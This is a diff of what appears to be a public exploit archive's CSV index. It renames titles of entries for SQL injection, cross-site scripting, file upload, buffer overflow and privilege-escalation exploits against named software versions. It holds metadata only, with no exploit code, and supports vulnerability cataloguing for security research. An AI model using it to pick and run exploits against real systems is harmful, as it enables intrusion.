Comments Module moderate Parameter Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 26188,platforms/php/webapps/26188.txt,"PostNuke 0.76 RC4b - user.php htmltext Parameter Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 @@ -23369,7 +23370,7 @@ id,file,description,date,author,platform,type,port 26222,platforms/windows/local/26222.c,"Microsoft Windows 2000/2003/XP - Keyboard Event Privilege Escalation",2005-08-06,"Andres Tarasco",windows,local,0 26223,platforms/php/webapps/26223.txt,"Land Down Under 601/602/700/701/800/801 - events.php HTML Injection",2005-09-06,conor.e.buckley,php,webapps,0 26224,platforms/php/webapps/26224.txt,"Unclassified NewsBoard 1.5.3 - Description Field HTML Injection",2005-09-06,retrogod@aliceposta.it,php,webapps,0 -26225,platforms/php/webapps/26225.txt,"MAXdev MD-Pro 1.0.73 - Arbitrary Remote File Upload",2005-09-06,rgod,php,webapps,0 +26225,platforms/php/webapps/26225.txt,"MAXdev MD-Pro 1.0.73 - Arbitrary File Upload",2005-09-06,rgod,php,webapps,0 26226,platforms/php/webapps/26226.txt,"MAXdev MD-Pro 1.0.73 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-06,rgod,php,webapps,0 26227,platforms/php/webapps/26227.txt,"MyBulletinBoard 1.0 - forumdisplay.php Cross-Site Scripting",2005-09-06,Dominic.Parikh,php,webapps,0 26228,platforms/php/webapps/26228.txt,"MyBulletinBoard 1.0 - Multiple SQL Injections",2005-09-06,stranger-killer,php,webapps,0 @@ -23383,9 +23384,9 @@ id,file,description,date,author,platform,type,port 26236,platforms/php/webapps/26236.txt,"Stylemotion WEB//NEWS 1.4 - print.php id Parameter SQL Injection",2005-09-08,onkel_fisch,php,webapps,0 26237,platforms/php/webapps/26237.txt,"AMember Pro 2.3.4 - Remote File Inclusion",2005-09-08,"NewAngels Team",php,webapps,0 26240,platforms/php/webapps/26240.txt,"Ultimate WordPress Auction Plugin 1.0 - Cross-Site Request Forgery",2013-06-17,expl0i13r,php,webapps,0 -26241,platforms/php/webapps/26241.txt,"Fly-High CMS 2012-07-08 - Unrestricted File Upload Exploit",2013-06-17,"CWH Underground",php,webapps,0 -26242,platforms/windows/local/26242.py,"Adrenalin Player 2.2.5.3 - '.wax' SEH Buffer Overflow",2013-06-17,Onying,windows,local,0 -26243,platforms/php/webapps/26243.txt,"Havalite CMS 1.1.7 - Unrestricted File Upload Exploit",2013-06-17,"CWH Underground",php,webapps,0 +26241,platforms/php/webapps/26241.txt,"Fly-High CMS 2012-07-08 - Unrestricted Arbitrary File Upload",2013-06-17,"CWH Underground",php,webapps,0 +26242,platforms/windows/local/26242.py,"Adrenalin Player 2.2.5.3 - '.wax' Buffer Overflow (SEH)",2013-06-17,Onying,windows,local,0 +26243,platforms/php/webapps/26243.txt,"Havalite CMS 1.1.7 - Unrestricted Arbitrary File Upload",2013-06-17,"CWH Underground",php,webapps,0 26244,platforms/php/webapps/26244.txt,"SPBAS Business Automation Software 2012 - Multiple Vulnerabilities",2013-06-17,"Christy Philip Mathew",php,webapps,0 26245,platforms/windows/local/26245.py,"Winamp 5.12 - '.m3u' Stack Based Buffer Overflow",2013-06-17,superkojiman,windows,local,0 26246,platforms/php/webapps/26246.txt,"Simple File Manager 024 - Login Bypass",2013-06-17,Chako,php,webapps,0 @@ -23447,7 +23448,7 @@ id,file,description,date,author,platform,type,port 26313,platforms/php/webapps/26313.txt,"Merak Mail Server 8.2.4 r - Arbitrary File Deletion",2005-09-30,ShineShadow,php,webapps,0 26386,platforms/php/webapps/26386.txt,"Nuked-klaN 1.7 Forum Module - Multiple Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 26387,platforms/php/webapps/26387.txt,"Nuked-klaN 1.7 Sections Module - artid Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 -26316,platforms/php/webapps/26316.php,"imacs CMS 0.3.0 - Unrestricted File Upload Exploit",2013-06-19,"CWH Underground",php,webapps,0 +26316,platforms/php/webapps/26316.php,"imacs CMS 0.3.0 - Unrestricted Arbitrary File Upload",2013-06-19,"CWH Underground",php,webapps,0 26330,platforms/multiple/remote/26330.txt,"Oracle HTML DB 1.5/1.6 - wwv_flow.accept p_t02 Parameter Cross-Site Scripting",2005-10-07,Red-Database-Security,multiple,remote,0 26331,platforms/multiple/dos/26331.txt,"Oracle 9.0 iSQL*Plus TLS Listener - Remote Denial of Service",2005-10-07,"Alexander Kornbrust",multiple,dos,0 26318,platforms/hardware/remote/26318.py,"TP-Link Print Server TL PS110U - Sensitive Information Enumeration",2013-06-19,SANTHO,hardware,remote,0 @@ -23492,7 +23493,7 @@ id,file,description,date,author,platform,type,port 26364,platforms/php/webapps/26364.txt,"MySource 2.14 - Socket.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 26365,platforms/php/webapps/26365.txt,"MySource 2.14 - Request.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 26366,platforms/php/webapps/26366.txt,"GLPI 0.83.8 - Multiple Vulnerabilities",2013-06-21,LiquidWorm,php,webapps,0 -26367,platforms/windows/local/26367.py,"Adrenalin Player 2.2.5.3 - '.asx' SEH Buffer Overflow",2013-06-21,Onying,windows,local,0 +26367,platforms/windows/local/26367.py,"Adrenalin Player 2.2.5.3 - '.asx' Buffer Overflow (SEH)",2013-06-21,Onying,windows,local,0 26368,platforms/freebsd/local/26368.c,"FreeBSD 9.0-9.1 mmap/ptrace - Privilege Escalation",2013-06-21,Hunger,freebsd,local,0 26369,platforms/php/webapps/26369.txt,"MySource 2.14 - mail.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 26370,platforms/php/webapps/26370.txt,"MySource 2.14 - Date.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 @@ -23525,8 +23526,8 @@ id,file,description,date,author,platform,type,port 26399,platforms/php/webapps/26399.txt,"Belchior Foundry VCard 2.9 - Remote File Inclusion",2005-10-26,X,php,webapps,0 26400,platforms/php/webapps/26400.txt,"Flyspray 0.9 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-26,Lostmon,php,webapps,0 26401,platforms/hardware/webapps/26401.txt,"TRENDnet TE100-P1U Print Server Firmware 4.11 - Authentication Bypass",2013-06-24,Chako,hardware,webapps,0 -26402,platforms/windows/local/26402.py,"Mediacoder (.lst) - SEH Buffer Overflow",2013-06-24,metacom,windows,local,0 -26403,platforms/windows/local/26403.py,"Mediacoder - '.m3u' SEH Buffer Overflow",2013-06-24,metacom,windows,local,0 +26402,platforms/windows/local/26402.py,"Mediacoder (.lst) - Buffer Overflow (SEH)",2013-06-24,metacom,windows,local,0 +26403,platforms/windows/local/26403.py,"Mediacoder - '.m3u' Buffer Overflow (SEH)",2013-06-24,metacom,windows,local,0 26404,platforms/windows/local/26404.py,"Mediacoder PMP Edition 0.8.17 - '.m3u' Buffer Overflow",2013-06-24,metacom,windows,local,0 26405,platforms/php/webapps/26405.txt,"Top Games Script 1.2 - (play.php gid Parameter) SQL Injection",2013-06-24,"AtT4CKxT3rR0r1ST ",php,webapps,0 26406,platforms/php/webapps/26406.txt,"Alienvault OSSIM Open Source SIEM 4.1 - Multiple SQL Vulnerabilities",2013-06-24,"Glafkos Charalambous ",php,webapps,0 @@ -23544,11 +23545,11 @@ id,file,description,date,author,platform,type,port 26416,platforms/php/webapps/26416.txt,"Elemata CMS RC3.0 - (global.php id Parameter) SQL Injection",2013-06-24,"CWH Underground",php,webapps,0 26827,platforms/php/webapps/26827.txt,"QuickPayPro 3.1 - popups.edit.php popupid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26418,platforms/windows/local/26418.rb,"Novell Client 4.91 SP4 - nwfs.sys Privilege Escalation",2013-06-24,Metasploit,windows,local,0 -26419,platforms/linux/remote/26419.rb,"ZPanel 10.0.0.2 - htpasswd Module Username Command Execution",2013-06-24,Metasploit,linux,remote,0 +26419,platforms/linux/remote/26419.rb,"ZPanel 10.0.0.2 - htpasswd Module 'Username' Command Execution",2013-06-24,Metasploit,linux,remote,0 26420,platforms/windows/remote/26420.rb,"HP System Management Homepage - JustGetSNMPQueue Command Injection",2013-06-24,Metasploit,windows,remote,2381 26421,platforms/php/remote/26421.rb,"LibrettoCMS File Manager - Arbitrary File Upload",2013-06-24,Metasploit,php,remote,0 26422,platforms/linux/remote/26422.rb,"MoinMoin - twikidraw Action Traversal File Upload",2013-06-24,Metasploit,linux,remote,0 -26423,platforms/php/webapps/26423.txt,"Mantis 0.19.2/1.0 - Bug_sponsorship_list_view_inc.php File Include",2005-10-26,"Andreas Sandblad",php,webapps,0 +26423,platforms/php/webapps/26423.txt,"Mantis 0.19.2/1.0 - Bug_sponsorship_list_view_inc.php File Inclusion",2005-10-26,"Andreas Sandblad",php,webapps,0 26424,platforms/windows/remote/26424.txt,"Snoopy 0.9x/1.0/1.2 - Arbitrary Command Execution",2005-10-26,"D. Fabian",windows,remote,0 26425,platforms/php/webapps/26425.pl,"Woltlab 1.1/2.x - Info-DB Info_db.php Multiple SQL Injection",2005-10-26,admin@batznet.com,php,webapps,0 26426,platforms/asp/webapps/26426.html,"Techno Dreams Multiple Scripts - Multiple SQL Injections",2005-10-26,"farhad koosha",asp,webapps,0 @@ -23568,7 +23569,7 @@ id,file,description,date,author,platform,type,port 26440,platforms/php/webapps/26440.txt,"PHPCafe Tutorial Manager - 'index.php' SQL Injection",2005-10-31,almaster,php,webapps,0 26441,platforms/php/webapps/26441.txt,"OaBoard 1.0 - forum.php Multiple SQL Injection",2005-10-31,abducter_minds@yahoo.com,php,webapps,0 26442,platforms/php/webapps/26442.txt,"PHP 4.x - PHPInfo Cross-Site Scripting",2005-10-31,"Stefan Esser",php,webapps,0 -26443,platforms/php/remote/26443.php,"PHP 4.x/5.0.x - File Upload GLOBAL Variable Overwrite",2005-10-31,rgod,php,remote,0 +26443,platforms/php/remote/26443.php,"PHP 4.x/5.0.x - Arbitrary File Upload GLOBAL Variable Overwrite",2005-10-31,rgod,php,remote,0 26444,platforms/asp/webapps/26444.txt,"Comersus Backoffice 4.x/5.0/6.0 - comersus_Backoffice_supportError.asp error Parameter Cross-Site Scripting",2005-10-31,_6mO_HaCk,asp,webapps,0 26445,platforms/asp/webapps/26445.pl,"Comersus Backoffice 4.x/5.0/6.0 - /comersus/database/comersus.mdb Direct Request Database Disclosure",2005-10-31,_6mO_HaCk,asp,webapps,0 26446,platforms/php/webapps/26446.txt,"Belchior Foundry vCard Pro 3.1 - Addrbook.php SQL Injection",2005-11-01,almaster,php,webapps,0 @@ -23579,7 +23580,7 @@ id,file,description,date,author,platform,type,port 26451,platforms/linux/local/26451.rb,"ZPanel zsudo - Privilege Escalation",2013-06-26,Metasploit,linux,local,0 26452,platforms/win_x86/local/26452.rb,"Novell Client 2 SP3 - nicm.sys Privilege Escalation",2013-06-26,Metasploit,win_x86,local,0 26453,platforms/php/webapps/26453.py,"PHP Charts 1.0 - (index.php type Parameter) Remote Code Execution",2013-06-26,infodox,php,webapps,0 -26454,platforms/freebsd/local/26454.rb,"FreeBSD 9 - Address Space manipulation Privilege Escalation",2013-06-26,Metasploit,freebsd,local,0 +26454,platforms/freebsd/local/26454.rb,"FreeBSD 9 - Address Space Manipulation Privilege Escalation",2013-06-26,Metasploit,freebsd,local,0 26455,platforms/php/webapps/26455.txt,"VUBB - 'index.php' Cross-Site Scripting",2005-11-01,"Alireza Hassani",php,webapps,0 26456,platforms/php/webapps/26456.txt,"XMB Forum 1.9.3 - post.php SQL Injection",2005-11-01,almaster,php,webapps,0 26457,platforms/windows/dos/26457.txt,"Microsoft Internet Explorer 6 - Malformed HTML Parsing Denial of Service (1)",2005-11-01,ad@class101.org,windows,dos,0 @@ -23625,7 +23626,7 @@ id,file,description,date,author,platform,type,port 26498,platforms/linux/local/26498.txt,"Sudo Perl 1.6.x - Environment Variable Handling Security Bypass",2005-11-11,"Charles Morris",linux,local,0 26499,platforms/php/webapps/26499.txt,"PHPSysInfo 2.x - Multiple Input Validation Vulnerabilities",2005-11-11,anonymous,php,webapps,0 26500,platforms/php/webapps/26500.txt,"PHPWebThings 1.4 - download.php File Parameter SQL Injection",2005-11-12,A.1.M,php,webapps,0 -26501,platforms/php/webapps/26501.txt,"ActiveCampaign 1-2-All Broadcast Email 4.0 - Admin Control Panel Username SQL Injection",2005-11-12,bhs_team,php,webapps,0 +26501,platforms/php/webapps/26501.txt,"ActiveCampaign 1-2-All Broadcast Email 4.0 - Admin Control Panel 'Username' SQL Injection",2005-11-12,bhs_team,php,webapps,0 26502,platforms/php/webapps/26502.txt,"Help Center Live 1.0/1.2/2.0 - module.php Local File Inclusion",2005-11-14,"HACKERS PAL",php,webapps,0 26503,platforms/php/webapps/26503.txt,"Wizz Forum - ForumAuthDetails.php AuthID Parameter SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 26504,platforms/php/webapps/26504.txt,"Wizz Forum - forumreply.php TopicID Parameter SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 @@ -23649,7 +23650,7 @@ id,file,description,date,author,platform,type,port 26521,platforms/php/webapps/26521.txt,"C.P.Sub 4.5 - Authentication Bypass",2013-07-01,Chako,php,webapps,0 26523,platforms/windows/local/26523.rb,"AudioCoder (.lst) - Buffer Overflow (Metasploit)",2013-07-01,Asesino04,windows,local,0 27437,platforms/php/webapps/27437.txt,"Invision Power Services Invision Board 2.0.4 - 'index.php' st Parameter Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps,0 -26525,platforms/windows/local/26525.py,"Adrenalin Player 2.2.5.3 - '.wvx' SEH Buffer Overflow",2013-07-01,MrXors,windows,local,0 +26525,platforms/windows/local/26525.py,"Adrenalin Player 2.2.5.3 - '.wvx' Buffer Overflow (SEH)",2013-07-01,MrXors,windows,local,0 26526,platforms/windows/dos/26526.py,"VLC Media Player 2.0.7 - '.png' Crash (PoC)",2013-07-01,"Kevin Fujimoto",windows,dos,0 26527,platforms/hardware/webapps/26527.txt,"Barracuda SSL VPN 680Vx 2.3.3.193 - Multiple Script Injection Vulnerabilities",2013-07-01,LiquidWorm,hardware,webapps,0 26528,platforms/hardware/webapps/26528.txt,"Fortigate Firewalls - Cross-Site Request Forgery",2013-07-01,"Sven Wurth",hardware,webapps,0 @@ -24087,7 +24088,7 @@ id,file,description,date,author,platform,type,port 26968,platforms/php/webapps/26968.txt,"SyntaxCMS - Search Query Cross-Site Scripting",2005-12-21,r0t3d3Vil,php,webapps,0 26969,platforms/asp/webapps/26969.txt,"Tangora Portal CMS 4.0 - Action Parameter Cross-Site Scripting",2005-12-22,r0t3d3Vil,asp,webapps,0 26970,platforms/windows/local/26970.c,"McAfee VirusScan 8.0 - Path Specification Privilege Escalation",2005-12-22,"Reed Arvin",windows,local,0 -26971,platforms/osx/dos/26971.txt,"Apple Mac OS X - KHTMLParser Remote Denial of Service",2005-12-22,"Tom Ferris",osx,dos,0 +26971,platforms/osx/dos/26971.txt,"Apple Mac OSX - KHTMLParser Remote Denial of Service",2005-12-22,"Tom Ferris",osx,dos,0 26972,platforms/jsp/webapps/26972.txt,"oracle Application server discussion forum portlet - Multiple Vulnerabilities",2005-12-23,"Johannes Greil",jsp,webapps,0 26973,platforms/php/webapps/26973.txt,"Cerberus Helpdesk 2.649 - cer_KnowledgebaseHandler.class.php _load_article_details Function SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 26974,platforms/php/webapps/26974.txt,"Cerberus Helpdesk 2.649 - addresses_export.php queues Parameter SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 @@ -24227,7 +24228,7 @@ id,file,description,date,author,platform,type,port 27102,platforms/php/webapps/27102.txt,"PowerPortal 1.1/1.3 - 'index.php' search Parameter Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0 27103,platforms/php/webapps/27103.txt,"PowerPortal 1.1/1.3 - search.php search Parameter Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0 27104,platforms/php/webapps/27104.txt,"aoblogger 2.3 - URL BBcode Cross-Site Scripting",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 -27105,platforms/php/webapps/27105.txt,"aoblogger 2.3 - 'login.php' username Field SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 +27105,platforms/php/webapps/27105.txt,"aoblogger 2.3 - 'login.php' 'Username' Field SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 27106,platforms/php/webapps/27106.txt,"aoblogger 2.3 - create.php Unauthenticated Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 27107,platforms/php/webapps/27107.txt,"PHPXplorer 0.9.33 - action.php Directory Traversal",2006-01-16,liz0,php,webapps,0 27108,platforms/multiple/dos/27108.txt,"Dual DHCP DNS Server 1.0 - DHCP Options Remote Buffer Overflow",2006-01-07,"Luigi Auriemma",multiple,dos,0 @@ -24255,7 +24256,7 @@ id,file,description,date,author,platform,type,port 27130,platforms/php/webapps/27130.txt,"Basic Forum by JM LLC - Multiple Vulnerabilities",2013-07-27,Sp3ctrecore,php,webapps,0 27131,platforms/hardware/dos/27131.py,"Galil-RIO Modbus - Denial of Service",2013-07-27,Sapling,hardware,dos,0 27132,platforms/hardware/shellcode/27132.txt,"MIPS - (Little Endian) system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",hardware,shellcode,0 -27133,platforms/linux_mips/remote/27133.py,"ASUS RT-AC66U - acsd Parameter Remote Root Shell Exploit",2013-07-27,"Jacob Holcomb",linux_mips,remote,0 +27133,platforms/linux_mips/remote/27133.py,"ASUS RT-AC66U - acsd Parameter Remote Root Shell",2013-07-27,"Jacob Holcomb",linux_mips,remote,0 27134,platforms/hardware/webapps/27134.pl,"Broadkam PJ871 - Authentication Bypass",2013-07-27,d3c0der,hardware,webapps,0 27135,platforms/multiple/remote/27135.rb,"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution",2013-07-27,Metasploit,multiple,remote,8080 27136,platforms/php/webapps/27136.txt,"Symantec Web Gateway 5.1.0.x - Multiple Vulnerabilities",2013-07-27,"SEC Consult",php,webapps,0 @@ -24278,7 +24279,7 @@ id,file,description,date,author,platform,type,port 27153,platforms/php/webapps/27153.txt,"Cerberus Helpdesk 2.7 - Clients.php Cross-Site Scripting",2006-01-31,preben@watchcom.no,php,webapps,0 27154,platforms/php/webapps/27154.txt,"Farsinews 2.1 - Loginout.php Remote File Inclusion",2006-01-31,"Hamid Ebadi",php,webapps,0 27155,platforms/php/webapps/27155.txt,"MyBB 1.0/1.1 - 'index.php' Referrer Cookie SQL Injection",2006-01-31,Devil-00,php,webapps,0 -27156,platforms/php/webapps/27156.txt,"SZUserMgnt 1.4 - Username Parameter SQL Injection",2006-02-01,"Aliaksandr Hartsuyeu",php,webapps,0 +27156,platforms/php/webapps/27156.txt,"SZUserMgnt 1.4 - 'Username' Parameter SQL Injection",2006-02-01,"Aliaksandr Hartsuyeu",php,webapps,0 27157,platforms/php/webapps/27157.txt,"SPIP 1.8/1.9 - Multiple SQL Injections",2006-02-01,Siegfried,php,webapps,0 27158,platforms/php/webapps/27158.txt,"SPIP 1.8/1.9 - index.php3 Cross-Site Scripting",2006-02-01,Siegfried,php,webapps,0 27159,platforms/multiple/dos/27159.txt,"Fcron 3.0 - Convert-FCronTab Local Buffer Overflow",2006-02-01,"Adam Zabrocki",multiple,dos,0 @@ -24321,13 +24322,13 @@ id,file,description,date,author,platform,type,port 27197,platforms/php/webapps/27197.txt,"ImageVue 0.16.1 - dir.php Folder Permission Disclosure",2006-02-11,zjieb,php,webapps,0 27198,platforms/php/webapps/27198.txt,"ImageVue 0.16.1 - readfolder.php path Variable Arbitrary Directory Listing",2006-02-11,zjieb,php,webapps,0 27199,platforms/php/webapps/27199.txt,"ImageVue 0.16.1 - 'index.php' bgcol Parameter Cross-Site Scripting",2006-02-11,zjieb,php,webapps,0 -27200,platforms/php/webapps/27200.txt,"ImageVue 0.16.1 - upload.php Unrestricted File Upload",2006-02-11,zjieb,php,webapps,0 +27200,platforms/php/webapps/27200.txt,"ImageVue 0.16.1 - upload.php Unrestricted Arbitrary File Upload",2006-02-11,zjieb,php,webapps,0 27201,platforms/php/webapps/27201.txt,"Siteframe Beaumont 5.0.1 - search.php Q Parameter Cross-Site Scripting",2006-02-12,Kiki,php,webapps,0 27202,platforms/php/webapps/27202.txt,"Lawrence Osiris DB_eSession 1.0.2 - Class SQL Injection",2006-02-13,"GulfTech Security",php,webapps,0 27203,platforms/hardware/remote/27203.pl,"Fortinet Fortigate 2.x/3.0 - URL Filtering Bypass",2006-02-13,"Mathieu Dessus",hardware,remote,0 27204,platforms/php/webapps/27204.html,"Virtual Hosting Control System 2.2/2.4 - 'change_password.php' Current Password",2006-02-13,"Roman Medina-Heigl Hernandez",php,webapps,0 27205,platforms/php/webapps/27205.html,"Virtual Hosting Control System 2.2/2.4 - 'login.php' check_login() Function Authentication Bypass",2006-02-13,"Roman Medina-Heigl Hernandez",php,webapps,0 -27206,platforms/php/webapps/27206.txt,"XMB Forum 1.8/1.9 - u2u.php username Parameter Cross-Site Scripting",2006-02-13,"James Bercegay",php,webapps,0 +27206,platforms/php/webapps/27206.txt,"XMB Forum 1.8/1.9 - u2u.php 'Username' Parameter Cross-Site Scripting",2006-02-13,"James Bercegay",php,webapps,0 27207,platforms/php/webapps/27207.txt,"Clever Copy 2.0/3.0 - Multiple HTML Injection Vulnerabilities",2006-02-13,"Aliaksandr Hartsuyeu",php,webapps,0 27208,platforms/php/webapps/27208.txt,"PHP-Nuke 6.x/7.x - header.php Pagetitle Parameter Cross-Site Scripting",2006-02-13,"Janek Vind",php,webapps,0 27209,platforms/php/webapps/27209.txt,"Gastebuch 1.3.2 - Cross-Site Scripting",2006-02-13,"Micha Borrmann",php,webapps,0 @@ -24398,7 +24399,7 @@ id,file,description,date,author,platform,type,port 27272,platforms/php/webapps/27272.txt,"SocialEngine Timeline Plugin 4.2.5p9 - Arbitrary File Upload",2013-08-02,spyk2r,php,webapps,0 27273,platforms/windows/dos/27273.txt,"TEC-IT TBarCode - OCX ActiveX Control (TBarCode4.ocx 4.1.0) Crash (PoC)",2013-08-02,d3b4g,windows,dos,0 27274,platforms/php/webapps/27274.txt,"Ginkgo CMS - 'index.php rang Parameter' SQL Injection",2013-08-02,Raw-x,php,webapps,0 -27275,platforms/php/webapps/27275.txt,"FunGamez - Remote File Upload",2013-08-02,"cr4wl3r ",php,webapps,0 +27275,platforms/php/webapps/27275.txt,"FunGamez - Arbitrary File Upload",2013-08-02,"cr4wl3r ",php,webapps,0 27276,platforms/php/webapps/27276.html,"Bigace CMS 2.7.8 - Add Admin Account Cross-Site Request Forgery",2013-08-02,"Yashar shahinzadeh",php,webapps,0 27277,platforms/windows/remote/27277.py,"PCMAN FTP 2.07 - PASS Command Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0 27528,platforms/hardware/remote/27528.rb,"D-Link Devices - Unauthenticated Remote Command Execution (2)",2013-08-12,Metasploit,hardware,remote,0 @@ -24444,7 +24445,7 @@ id,file,description,date,author,platform,type,port 27319,platforms/hardware/remote/27319.txt,"Thomson SpeedTouch 500 Series - NewUser Function 31 Variable Persistent User Creation",2006-02-25,"Preben Nylokken",hardware,remote,0 27320,platforms/hardware/remote/27320.txt,"Thomson SpeedTouch 500 Series - LocalNetwork Page name Parameter Cross-Site Scripting",2006-02-25,"Preben Nylokken",hardware,remote,0 27321,platforms/php/webapps/27321.txt,"Fantastic News 2.1.1 - SQL Injection",2006-02-27,SAUDI,php,webapps,0 -27322,platforms/php/webapps/27322.txt,"Woltlab Burning Board 1.1.1/2.x - galerie_index.php username Parameter Cross-Site Scripting",2006-02-27,botan,php,webapps,0 +27322,platforms/php/webapps/27322.txt,"Woltlab Burning Board 1.1.1/2.x - galerie_index.php 'Username' Parameter Cross-Site Scripting",2006-02-27,botan,php,webapps,0 27323,platforms/php/webapps/27323.txt,"Woltlab Burning Board 1.1.1/2.x - galerie_onfly.php Cross-Site Scripting",2006-02-27,botan,php,webapps,0 27324,platforms/php/webapps/27324.txt,"Archangel Weblog 0.90.2 - Authentication Bypass",2006-02-27,KingOfSka,php,webapps,0 27325,platforms/windows/remote/27325.txt,"DirectContact 0.3.b - Directory Traversal",2006-02-27,"Donato Ferrante",windows,remote,0 @@ -24736,7 +24737,7 @@ id,file,description,date,author,platform,type,port 27640,platforms/multiple/dos/27640.txt,"W3C Amaya 9.4 - legend color Attribute Value Overflow",2006-04-13,"Thomas Waldegger",multiple,dos,0 27641,platforms/linux/dos/27641.txt,"Opera Web Browser 8.52 - Stylesheet Attribute Buffer Overflow",2006-04-13,"SEC Consult",linux,dos,0 27642,platforms/php/webapps/27642.txt,"AR-Blog 5.2 - print.php Cross-Site Scripting",2006-04-14,ALMOKANN3,php,webapps,0 -27643,platforms/php/webapps/27643.php,"PHPAlbum 0.2.2/0.2.3/4.1 - Language.php File Include",2006-04-15,rgod,php,webapps,0 +27643,platforms/php/webapps/27643.php,"PHPAlbum 0.2.2/0.2.3/4.1 - Language.php File Inclusion",2006-04-15,rgod,php,webapps,0 27644,platforms/php/webapps/27644.txt,"PlanetSearch + - Planetsearchplus.php Cross-Site Scripting",2006-04-13,d4igoro,php,webapps,0 27645,platforms/php/webapps/27645.txt,"PowerClan 1.14 - member.php SQL Injection",2006-04-13,d4igoro,php,webapps,0 27646,platforms/php/webapps/27646.txt,"LifeType 1.0.3 - 'index.php' Cross-Site Scripting",2006-04-13,"Rusydi Hasan",php,webapps,0 @@ -24789,7 +24790,7 @@ id,file,description,date,author,platform,type,port 27693,platforms/php/webapps/27693.txt,"otalCalendar - about.php inc_dir Parameter Remote File Inclusion",2006-04-19,VietMafia,php,webapps,0 27694,platforms/cgi/webapps/27694.txt,"AWStats 4.0/5.x/6.x - AWStats.pl Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,cgi,webapps,0 27695,platforms/cgi/webapps/27695.txt,"Net Clubs Pro 4.0 - sendim.cgi Multiple Parameter Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0 -27696,platforms/cgi/webapps/27696.txt,"Net Clubs Pro 4.0 - imessage.cgi username Parameter Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0 +27696,platforms/cgi/webapps/27696.txt,"Net Clubs Pro 4.0 - imessage.cgi 'Username' Parameter Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0 27697,platforms/cgi/webapps/27697.txt,"Net Clubs Pro 4.0 - login.cgi Password Parameter Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0 28055,platforms/hardware/webapps/28055.txt,"TP-Link TD-W8951ND - Multiple Vulnerabilities",2013-09-03,xistence,hardware,webapps,0 28056,platforms/hardware/remote/28056.txt,"Mikrotik RouterOS sshd (ROSSSH) - Remote Pre-Authentication Heap Corruption",2013-09-03,kingcope,hardware,remote,0 @@ -24817,8 +24818,8 @@ id,file,description,date,author,platform,type,port 27711,platforms/php/webapps/27711.txt,"ThWboard 3.0 - 'index.php' Cross-Site Scripting",2006-04-20,"CrAzY CrAcKeR",php,webapps,0 27712,platforms/cgi/webapps/27712.txt,"Portal Pack 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-20,r0t,cgi,webapps,0 27713,platforms/php/webapps/27713.txt,"Manic Web MWGuest 2.1 - MWguest.php HTML Injection",2006-04-20,"Aliaksandr Hartsuyeu",php,webapps,0 -27714,platforms/osx/dos/27714.txt,"Apple Mac OS X 10.x - LZWDecodeVector (.tiff) Overflow",2006-04-20,"Tom Ferris",osx,dos,0 -27715,platforms/osx/dos/27715.txt,"Apple Mac OS X 10.x - '.zip' Parsing BOMStackPop() Function Overflow",2006-04-20,"Tom Ferris",osx,dos,0 +27714,platforms/osx/dos/27714.txt,"Apple Mac OSX 10.x - LZWDecodeVector (.tiff) Overflow",2006-04-20,"Tom Ferris",osx,dos,0 +27715,platforms/osx/dos/27715.txt,"Apple Mac OSX 10.x - '.zip' Parsing BOMStackPop() Function Overflow",2006-04-20,"Tom Ferris",osx,dos,0 27716,platforms/multiple/remote/27716.txt,"Asterisk Recording Interface 0.7.15 - Audio.php Information Disclosure",2006-04-21,"Francois Harvey",multiple,remote,0 27717,platforms/php/webapps/27717.txt,"phpLDAPadmin 0.9.8 - compare_form.php dn Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 27718,platforms/php/webapps/27718.txt,"phpLDAPadmin 0.9.8 - copy_form.php dn Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 @@ -24844,10 +24845,10 @@ id,file,description,date,author,platform,type,port 27741,platforms/php/webapps/27741.txt,"Farsinews 2.5.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-26,O.U.T.L.A.W.,php,webapps,0 27742,platforms/php/webapps/27742.txt,"DevBB 1.0 - member.php Cross-Site Scripting",2006-04-26,Qex,php,webapps,0 27743,platforms/php/webapps/27743.txt,"MySmartBB 1.1.2/1.1.3 - Multiple Input Validation Vulnerabilities",2006-04-04,BoNy-m,php,webapps,0 -27744,platforms/windows/remote/27744.html,"Microsoft Internet Explorer 5.0.1 - Modal Dialog manipulation",2006-04-26,"Matthew Murphy",windows,remote,0 +27744,platforms/windows/remote/27744.html,"Microsoft Internet Explorer 5.0.1 - Modal Dialog Manipulation",2006-04-26,"Matthew Murphy",windows,remote,0 27745,platforms/windows/dos/27745.txt,"Outlook Express 5.5/6.0 / Windows Mail - MHTML URI Handler Information Disclosure",2006-04-27,codedreamer,windows,dos,0 27746,platforms/windows/remote/27746.txt,"winiso 5.3 - Directory Traversal",2006-04-28,Sowhat,windows,remote,0 